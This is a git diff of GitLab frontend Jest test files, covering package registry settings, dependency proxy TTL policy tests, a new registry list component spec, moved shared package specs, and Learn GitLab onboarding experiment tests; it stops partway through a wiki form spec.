a/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js @@ -17,6 +17,13 @@ describe('Package and Registries settings group cache updates', () => { }, }; + const updateDependencyProxyImageTtlGroupPolicyPayload = { + dependencyProxyImageTtlPolicy: { + enabled: false, + ttl: 45, + }, + }; + const cacheMock = { group: { packageSettings: { @@ -26,6 +33,10 @@ describe('Package and Registries settings group cache updates', () => { dependencyProxySetting: { enabled: true, }, + dependencyProxyImageTtlPolicy: { + enabled: true, + ttl: 45, + }, }, }; @@ -42,15 +53,26 @@ describe('Package and Registries settings group cache updates', () => { }); describe.each` - updateNamespacePackageSettings | updateDependencyProxySettings - ${updateNamespacePackageSettingsPayload} | ${updateDependencyProxySettingsPayload} - ${undefined} | ${updateDependencyProxySettingsPayload} - ${updateNamespacePackageSettingsPayload} | ${undefined} - ${undefined} | ${undefined} + updateNamespacePackageSettings | updateDependencyProxySettings | updateDependencyProxyImageTtlGroupPolicy + ${updateNamespacePackageSettingsPayload} | ${updateDependencyProxySettingsPayload} | ${undefined} + ${undefined} | ${updateDependencyProxySettingsPayload} | ${undefined} + ${updateNamespacePackageSettingsPayload} | ${undefined} | ${undefined} + ${undefined} | ${undefined} | ${updateDependencyProxyImageTtlGroupPolicyPayload} + ${undefined} | ${undefined} | ${undefined} `( 'updateGroupPackageSettings', - ({ updateNamespacePackageSettings, updateDependencyProxySettings }) => { - const payload = { data: { updateNamespacePackageSettings, updateDependencyProxySettings } }; + ({ + updateNamespacePackageSettings, + updateDependencyProxySettings, + updateDependencyProxyImageTtlGroupPolicy, + }) => { + const payload = { + data: { + updateNamespacePackageSettings, + updateDependencyProxySettings, + updateDependencyProxyImageTtlGroupPolicy, + }, + }; it('calls readQuery', () => { updateGroupPackageSettings('foo')(client, payload); expect(client.readQuery).toHaveBeenCalledWith(queryAndVariables); @@ -65,6 +87,7 @@ describe('Package and Registries settings group cache updates', () => { ...cacheMock.group, ...payload.data.updateNamespacePackageSettings, ...payload.data.updateDependencyProxySettings, + ...payload.data.updateDependencyProxyImageTtlGroupPolicy, }, }, }); diff --git a/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js b/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js index debeb9aa89c..b4efda3e7b2 100644 --- a/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js @@ -1,6 +1,7 @@ import { updateGroupPackagesSettingsOptimisticResponse, updateGroupDependencyProxySettingsOptimisticResponse, + updateDependencyProxyImageTtlGroupPolicyOptimisticResponse, } from '~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; describe('Optimistic responses', () => { @@ -38,4 +39,22 @@ describe('Optimistic responses', () => { `); }); }); + + describe('updateDependencyProxyImageTtlGroupPolicyOptimisticResponse', () => { + it('returns the correct structure', () => { + expect(updateDependencyProxyImageTtlGroupPolicyOptimisticResponse({ foo: 'bar' })) + .toMatchInlineSnapshot(` + Object { + "__typename": "Mutation", + "updateDependencyProxyImageTtlGroupPolicy": Object { + "__typename": "UpdateDependencyProxyImageTtlGroupPolicyPayload", + "dependencyProxyImageTtlPolicy": Object { + "foo": "bar", + }, + "errors": Array [], + }, + } + `); + }); + }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/mock_data.js b/spec/frontend/packages_and_registries/settings/group/mock_data.js index 81ba0795b7d..d53446de910 100644 --- a/spec/frontend/packages_and_registries/settings/group/mock_data.js +++ b/spec/frontend/packages_and_registries/settings/group/mock_data.js @@ -5,16 +5,25 @@ export const packageSettings = () => ({ genericDuplicateExceptionRegex: '', }); -export const dependencyProxySettings = () => ({ +export const dependencyProxySettings = (extend) => ({ enabled: true, + ...extend, +}); + +export const dependencyProxyImageTtlPolicy = (extend) => ({ + ttl: 90, + enabled: true, + ...extend, }); export const groupPackageSettingsMock = { data: { group: { + id: '1', fullPath: 'foo_group_path', packageSettings: packageSettings(), dependencyProxySetting: dependencyProxySettings(), + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), }, }, }; @@ -44,6 +53,16 @@ export const dependencyProxySettingMutationMock = (override) => ({ }, }); +export const dependencyProxyUpdateTllPolicyMutationMock = (override) => ({ + data: { + updateDependencyProxyImageTtlGroupPolicy: { + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), + errors: [], + ...override, + }, + }, +}); + export const groupPackageSettingsMutationErrorMock = { errors: [ { @@ -68,7 +87,8 @@ export const groupPackageSettingsMutationErrorMock = { }, ], }; -export const dependencyProxySettingMutationErrorMock = { + +export const mutationErrorMock = { errors: [ { message: 'Some error', diff --git a/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js b/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js index 9778f409010..a56bb75f8ed 100644 --- a/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js +++ b/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js @@ -11,6 +11,7 @@ export const containerExpirationPolicyData = () => ({ export const expirationPolicyPayload = (override) => ({ data: { project: { + id: '1', containerExpirationPolicy: { ...containerExpirationPolicyData(), ...override, diff --git a/spec/frontend/packages/shared/components/__snapshots__/publish_method_spec.js.snap b/spec/frontend/packages_and_registries/shared/__snapshots__/publish_method_spec.js.snap index acdf7c49ebd..5f243799bae 100644 --- a/spec/frontend/packages/shared/components/__snapshots__/publish_method_spec.js.snap +++ b/spec/frontend/packages_and_registries/shared/__snapshots__/publish_method_spec.js.snap @@ -37,6 +37,7 @@ exports[`publish_method renders 1`] = ` text="sha-baz" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js b/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js new file mode 100644 index 00000000000..aaca58d21bb --- /dev/null +++ b/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js @@ -0,0 +1,199 @@ +import { GlButton, GlFormCheckbox, GlKeysetPagination } from '@gitlab/ui'; +import { nextTick } from 'vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import component from '~/packages_and_registries/shared/components/registry_list.vue'; + +describe('Registry List', () => { + let wrapper; + + const items = [{ id: 'a' }, { id: 'b' }]; + const defaultPropsData = { + title: 'test_title', + items, + }; + + const rowScopedSlot = ` + <div data-testid="scoped-slot"> + <button @click="props.selectItem(props.item)">Select</button> + <span>{{props.first}}</span> + <p>{{props.isSelected(props.item)}}</p> + </div>`; + + const mountComponent = ({ propsData = defaultPropsData } = {}) => { + wrapper = shallowMountExtended(component, { + propsData, + scopedSlots: { + default: rowScopedSlot, + }, + }); + }; + + const findSelectAll = () => wrapper.findComponent(GlFormCheckbox); + const findDeleteSelected = () => wrapper.findComponent(GlButton); + const findPagination = () => wrapper.findComponent(GlKeysetPagination); + const findScopedSlots = () => wrapper.findAllByTestId('scoped-slot'); + const findScopedSlotSelectButton = (index) => findScopedSlots().at(index).find('button'); + const findScopedSlotFirstValue = (index) => findScopedSlots().at(index).find('span'); + const findScopedSlotIsSelectedValue = (index) => findScopedSlots().at(index).find('p'); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('header', () => { + it('renders the title passed in the prop', () => { + mountComponent(); + + expect(wrapper.text()).toContain(defaultPropsData.title); + }); + + describe('select all checkbox', () => { + beforeEach(() => { + mountComponent(); + }); + + it('exists', () => { + expect(findSelectAll().exists()).toBe(true); + }); + + it('select and unselect all', async () => { + // no row is not selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe(''); + }); + + // simulate selection + findSelectAll().vm.$emit('input', true); + await nextTick(); + + // all rows selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe('true'); + }); + + // simulate de-selection + findSelectAll().vm.$emit('input', ''); + await nextTick(); + + // no row is not selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe(''); + }); + }); + }); + + describe('delete button', () => { + it('has the correct text', () => { + mountComponent(); + + expect(findDeleteSelected().text()).toBe(component.i18n.deleteSelected); + }); + + it('is hidden when hiddenDelete is true', () => { + mountComponent({ propsData: { ...defaultPropsData, hiddenDelete: true } }); + + expect(findDeleteSelected().exists()).toBe(false); + }); + + it('is disabled when isLoading is true', () => { + mountComponent({ propsData: { ...defaultPropsData, isLoading: true } }); + + expect(findDeleteSelected().props('disabled')).toBe(true); + }); + + it('is disabled when no row is selected', async () => { + mountComponent(); + + expect(findDeleteSelected().props('disabled')).toBe(true); + + await findScopedSlotSelectButton(0).trigger('click'); + + expect(findDeleteSelected().props('disabled')).toBe(false); + }); + + it('on click emits the delete event with the selected rows', async () => { + mountComponent(); + + await findScopedSlotSelectButton(0).trigger('click'); + + findDeleteSelected().vm.$emit('click'); + + expect(wrapper.emitted('delete')).toEqual([[[items[0]]]]); + }); + }); + }); + + describe('main area', () => { + beforeEach(() => { + mountComponent(); + }); + + it('renders scopedSlots based on the items props', () => { + expect(findScopedSlots()).toHaveLength(items.length); + }); + + it('populates the scope of the slot correctly', async () => { + expect(findScopedSlots().at(0).exists()).toBe(true); + + // it's the first slot + expect(findScopedSlotFirstValue(0).text()).toBe('true'); + + // item is not selected, falsy is translated to empty string + expect(findScopedSlotIsSelectedValue(0).text()).toBe(''); + + // find the button with the bound function + await findScopedSlotSelectButton(0).trigger('click'); + + // the item is selected + expect(findScopedSlotIsSelectedValue(0).text()).toBe('true'); + }); + }); + + describe('footer', () => { + let pagination; + + beforeEach(() => { + pagination = { hasPreviousPage: false, hasNextPage: true }; + }); + + it('has a pagination', () => { + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + expect(findPagination().props()).toMatchObject(pagination); + }); + + it.each` + hasPreviousPage | hasNextPage | visible + ${true} | ${true} | ${true} + ${true} | ${false} | ${true} + ${false} | ${true} | ${true} + ${false} | ${false} | ${false} + `( + 'when hasPreviousPage is $hasPreviousPage and hasNextPage is $hasNextPage is $visible that the pagination is shown', + ({ hasPreviousPage, hasNextPage, visible }) => { + pagination = { hasPreviousPage, hasNextPage }; + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + expect(findPagination().exists()).toBe(visible); + }, + ); + + it('pagination emits the correct events', () => { + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + findPagination().vm.$emit('prev'); + + expect(wrapper.emitted('prev-page')).toEqual([[]]); + + findPagination().vm.$emit('next'); + + expect(wrapper.emitted('next-page')).toEqual([[]]); + }); + }); +}); diff --git a/spec/frontend/packages/shared/components/package_icon_and_name_spec.js b/spec/frontend/packages_and_registries/shared/package_icon_and_name_spec.js index c96a570a29c..d6d1970cb12 100644 --- a/spec/frontend/packages/shared/components/package_icon_and_name_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_icon_and_name_spec.js @@ -1,6 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import PackageIconAndName from '~/packages/shared/components/package_icon_and_name.vue'; +import PackageIconAndName from '~/packages_and_registries/shared/components/package_icon_and_name.vue'; describe('PackageIconAndName', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/package_path_spec.js b/spec/frontend/packages_and_registries/shared/package_path_spec.js index edbdd55c1d7..93425d4f399 100644 --- a/spec/frontend/packages/shared/components/package_path_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_path_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import PackagePath from '~/packages/shared/components/package_path.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; describe('PackagePath', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/package_tags_spec.js b/spec/frontend/packages_and_registries/shared/package_tags_spec.js index d26e4e76b87..33e96c0775e 100644 --- a/spec/frontend/packages/shared/components/package_tags_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_tags_spec.js @@ -1,6 +1,6 @@ import { mount } from '@vue/test-utils'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import { mockTags } from '../../mock_data'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import { mockTags } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; describe('PackageTags', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/packages_list_loader_spec.js b/spec/frontend/packages_and_registries/shared/packages_list_loader_spec.js index 4ff01068f92..0005162e0bb 100644 --- a/spec/frontend/packages/shared/components/packages_list_loader_spec.js +++ b/spec/frontend/packages_and_registries/shared/packages_list_loader_spec.js @@ -1,5 +1,5 @@ import { mount } from '@vue/test-utils'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; describe('PackagesListLoader', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/publish_method_spec.js b/spec/frontend/packages_and_registries/shared/publish_method_spec.js index 6014774990c..fa8f8f7641a 100644 --- a/spec/frontend/packages/shared/components/publish_method_spec.js +++ b/spec/frontend/packages_and_registries/shared/publish_method_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import PublishMethod from '~/packages/shared/components/publish_method.vue'; -import { packageList } from '../../mock_data'; +import PublishMethod from '~/packages_and_registries/shared/components/publish_method.vue'; +import { packageList } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; describe('publish_method', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/shared/utils_spec.js b/spec/frontend/packages_and_registries/shared/utils_spec.js index bbc8791ca21..962cb2257ce 100644 --- a/spec/frontend/packages_and_registries/shared/utils_spec.js +++ b/spec/frontend/packages_and_registries/shared/utils_spec.js @@ -4,8 +4,12 @@ import { keyValueToFilterToken, searchArrayToFilterTokens, extractFilterAndSorting, + beautifyPath, + getCommitLink, } from '~/packages_and_registries/shared/utils'; +import { packageList } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; + describe('Packages And Registries shared utils', () => { describe('getQueryParams', () => { it('returns an object from a query string, with arrays', () => { @@ -56,4 +60,30 @@ describe('Packages And Registries shared utils', () => { }, ); }); + + describe('beautifyPath', () => { + it('returns a string with spaces around /', () => { + expect(beautifyPath('foo/bar')).toBe('foo / bar'); + }); + it('does not fail for empty string', () => { + expect(beautifyPath()).toBe(''); + }); + }); + + describe('getCommitLink', () => { + it('returns a relative link when isGroup is false', () => { + const link = getCommitLink(packageList[0], false); + + expect(link).toContain('../commit'); + }); + + describe('when isGroup is true', () => { + it('returns an absolute link matching project path', () => { + const mavenPackage = packageList[0]; + const link = getCommitLink(mavenPackage, true); + + expect(link).toContain(`/${mavenPackage.project_path}/commit`); + }); + }); + }); }); diff --git a/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js b/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js deleted file mode 100644 index f84800d8266..00000000000 --- a/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js +++ /dev/null @@ -1,108 +0,0 @@ -import { GlBanner } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import MockAdapter from 'axios-mock-adapter'; -import { mockTracking, unmockTracking, triggerEvent } from 'helpers/tracking_helper'; -import axios from '~/lib/utils/axios_utils'; -import CustomizeHomepageBanner from '~/pages/dashboard/projects/index/components/customize_homepage_banner.vue'; - -const svgPath = '/illustrations/background'; -const provide = { - svgPath, - preferencesBehaviorPath: 'some/behavior/path', - calloutsPath: 'call/out/path', - calloutsFeatureId: 'some-feature-id', - trackLabel: 'home_page', -}; - -const createComponent = () => { - return shallowMount(CustomizeHomepageBanner, { provide, stubs: { GlBanner } }); -}; - -describe('CustomizeHomepageBanner', () => { - let trackingSpy; - let mockAxios; - let wrapper; - - beforeEach(() => { - mockAxios = new MockAdapter(axios); - document.body.dataset.page = 'some:page'; - trackingSpy = mockTracking('_category_', undefined, jest.spyOn); - wrapper = createComponent(); - }); - - afterEach(() => { - wrapper.destroy(); - wrapper = null; - mockAxios.restore(); - unmockTracking(); - }); - - it('should render the banner when not dismissed', () => { - expect(wrapper.find(GlBanner).exists()).toBe(true); - }); - - it('should close the banner when dismiss is clicked', async () => { - mockAxios.onPost(provide.calloutsPath).replyOnce(200); - expect(wrapper.find(GlBanner).exists()).toBe(true); - wrapper.find(GlBanner).vm.$emit('close'); - - await wrapper.vm.$nextTick(); - expect(wrapper.find(GlBanner).exists()).toBe(false); - }); - - it('includes the body text from options', () => { - expect(wrapper.html()).toContain(wrapper.vm.$options.i18n.body); - }); - - describe('tracking', () => { - const preferencesTrackingEvent = 'click_go_to_preferences'; - const mockTrackingOnWrapper = () => { - unmockTracking(); - trackingSpy = mockTracking('_category_', wrapper.element, jest.spyOn); - }; - - it('sets the needed data attributes for tracking button', async () => { - await wrapper.vm.$nextTick(); - const button = wrapper.find(`[href='${wrapper.vm.preferencesBehaviorPath}']`); - - expect(button.attributes('data-track-action')).toEqual(preferencesTrackingEvent); - expect(button.attributes('data-track-label')).toEqual(provide.trackLabel); - }); - - it('sends a tracking event when the banner is shown', () => { - const trackCategory = undefined; - const trackEvent = 'show_home_page_banner'; - - expect(trackingSpy).toHaveBeenCalledWith(trackCategory, trackEvent, { - label: provide.trackLabel, - }); - }); - - it('sends a tracking event when the banner is dismissed', async () => { - mockTrackingOnWrapper(); - mockAxios.onPost(provide.calloutsPath).replyOnce(200); - const trackCategory = undefined; - const trackEvent = 'click_dismiss'; - - wrapper.find(GlBanner).vm.$emit('close'); - - await wrapper.vm.$nextTick(); - expect(trackingSpy).toHaveBeenCalledWith(trackCategory, trackEvent, { - label: provide.trackLabel, - }); - }); - - it('sends a tracking event when the button is clicked', async () => { - mockTrackingOnWrapper(); - mockAxios.onPost(provide.calloutsPath).replyOnce(200); - const button = wrapper.find(`[href='${wrapper.vm.preferencesBehaviorPath}']`); - - triggerEvent(button.element); - - await wrapper.vm.$nextTick(); - expect(trackingSpy).toHaveBeenCalledWith('_category_', preferencesTrackingEvent, { - label: provide.trackLabel, - }); - }); - }); -}); diff --git a/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js b/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js index d6b394a42c6..6fb03fa28fe 100644 --- a/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js +++ b/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js @@ -2,7 +2,7 @@ import { GlEmptyState, GlLoadingIcon, GlTable } from '@gitlab/ui'; import { mount, shallowMount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import axios from '~/lib/utils/axios_utils'; -import PaginationBar from '~/import_entities/components/pagination_bar.vue'; +import PaginationBar from '~/vue_shared/components/pagination_bar/pagination_bar.vue'; import BulkImportsHistoryApp from '~/pages/import/bulk_imports/history/components/bulk_imports_history_app.vue'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; diff --git a/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap b/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap index 3e371a8765f..1586aded6e6 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap +++ b/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap @@ -2,6 +2,8 @@ exports[`Learn GitLab renders correctly 1`] = ` <div> + <!----> + <div class="row" > @@ -131,66 +133,60 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Set up CI/CD" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Set up CI/CD - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Set up CI/CD" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Set up CI/CD + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Start a free Ultimate trial" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Start a free Ultimate trial - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Start a free Ultimate trial" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Start a free Ultimate trial + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Add code owners" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Add code owners - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Add code owners" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Add code owners + + </a> <span class="gl-font-style-italic gl-text-gray-500" @@ -204,22 +200,20 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Add merge request approval" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Add merge request approval - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Add merge request approval" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Add merge request approval + + </a> <span class="gl-font-style-italic gl-text-gray-500" @@ -269,44 +263,40 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Create an issue" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Create an issue - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Create an issue" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Create an issue + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Submit a merge request" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Submit a merge request - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Submit a merge request" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Submit a merge request + + </a> <!----> </div> @@ -349,22 +339,20 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Run a Security scan using CI/CD" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Run a Security scan using CI/CD - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Run a Security scan using CI/CD" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Run a Security scan using CI/CD + + </a> <!----> </div> diff --git a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js index 882d233a239..f7b2154a935 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js @@ -1,4 +1,7 @@ import { shallowMount } from '@vue/test-utils'; +import { stubExperiments } from 'helpers/experimentation_helper'; +import { mockTracking, triggerEvent, unmockTracking } from 'helpers/tracking_helper'; +import eventHub from '~/invite_members/event_hub'; import LearnGitlabSectionLink from '~/pages/projects/learn_gitlab/components/learn_gitlab_section_link.vue'; const defaultAction = 'gitWrite'; @@ -23,6 +26,9 @@ describe('Learn GitLab Section Link', () => { }); }; + const openInviteMembesrModalLink = () => + wrapper.find('[data-testid="invite-for-help-continuous-onboarding-experiment-link"]'); + it('renders no icon when not completed', () => { createWrapper(undefined, { completed: false }); @@ -46,4 +52,54 @@ describe('Learn GitLab Section Link', () => { expect(wrapper.find('[data-testid="trial-only"]').exists()).toBe(true); }); + + describe('rendering a link to open the invite_members modal instead of a regular link', () => { + it.each` + action | experimentVariant | showModal + ${'userAdded'} | ${'candidate'} | ${true} + ${'userAdded'} | ${'control'} | ${false} + ${defaultAction} | ${'candidate'} | ${false} + ${defaultAction} | ${'control'} | ${false} + `( + 'when the invite_for_help_continuous_onboarding experiment has variant: $experimentVariant and action is $action, the modal link is shown: $showModal', + ({ action, experimentVariant, showModal }) => { + stubExperiments({ invite_for_help_continuous_onboarding: experimentVariant }); + createWrapper(action); + + expect(openInviteMembesrModalLink().exists()).toBe(showModal); + }, + ); + }); + + describe('clicking the link to open the invite_members modal', () => { + beforeEach(() => { + jest.spyOn(eventHub, '$emit').mockImplementation(); + + stubExperiments({ invite_for_help_continuous_onboarding: 'candidate' }); + createWrapper('userAdded'); + }); + + it('calls the eventHub', () => { + openInviteMembesrModalLink().vm.$emit('click'); + + expect(eventHub.$emit).toHaveBeenCalledWith('openModal', { + inviteeType: 'members', + source: 'learn_gitlab', + tasksToBeDoneEnabled: true, + }); + }); + + it('tracks the click', async () => { + const trackingSpy = mockTracking('_category_', wrapper.element, jest.spyOn); + + triggerEvent(openInviteMembesrModalLink().element); + + expect(trackingSpy).toHaveBeenCalledWith('_category_', 'click_link', { + label: 'Invite your colleagues', + property: 'Growth::Activation::Experiment::InviteForHelpContinuousOnboarding', + }); + + unmockTracking(); + }); + }); }); diff --git a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js index 7e97a539a99..7e71622770f 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js @@ -1,20 +1,35 @@ -import { GlProgressBar } from '@gitlab/ui'; +import { GlProgressBar, GlAlert } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; import LearnGitlab from '~/pages/projects/learn_gitlab/components/learn_gitlab.vue'; import eventHub from '~/invite_members/event_hub'; -import { testActions, testSections } from './mock_data'; +import { testActions, testSections, testProject } from './mock_data'; describe('Learn GitLab', () => { let wrapper; + let sidebar; let inviteMembersOpen = false; const createWrapper = () => { wrapper = mount(LearnGitlab, { - propsData: { actions: testActions, sections: testSections, inviteMembersOpen }, + propsData: { + actions: testActions, + sections: testSections, + project: testProject, + inviteMembersOpen, + }, }); }; beforeEach(() => { + sidebar = document.createElement('div'); + sidebar.innerHTML = ` + <div class="sidebar-top-level-items"> + <div class="active"> + <div class="count"></div> + </div> + </div> + `; + document.body.appendChild(sidebar); createWrapper(); }); @@ -22,6 +37,7 @@ describe('Learn GitLab', () => { wrapper.destroy(); wrapper = null; inviteMembersOpen = false; + sidebar.remove(); }); it('renders correctly', () => { @@ -66,4 +82,26 @@ describe('Learn GitLab', () => { expect(spy).not.toHaveBeenCalled(); }); }); + + describe('when the showSuccessfulInvitationsAlert event is fired', () => { + const findAlert = () => wrapper.findComponent(GlAlert); + + beforeEach(() => { + eventHub.$emit('showSuccessfulInvitationsAlert'); + }); + + it('displays the successful invitations alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('displays a message with the project name', () => { + expect(findAlert().text()).toBe( + "Your team is growing! You've successfully invited new team members to the test-project project.", + ); + }); + + it('modifies the sidebar percentage', () => { + expect(sidebar.textContent.trim()).toBe('22%'); + }); + }); }); diff --git a/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js b/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js index 8d6ac737db8..1e633cb7cf5 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js @@ -57,3 +57,7 @@ export const testSections = { svg: 'plan.svg', }, }; + +export const testProject = { + name: 'test-project', +}; diff --git a/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js b/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js index 9d510b3d231..f4236146d33 100644 --- a/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js +++ b/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js @@ -1,5 +1,6 @@ +import { nextTick } from 'vue'; import { GlLoadingIcon, GlModal } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; +import { mount, shallowMount } from '@vue/test-utils'; import 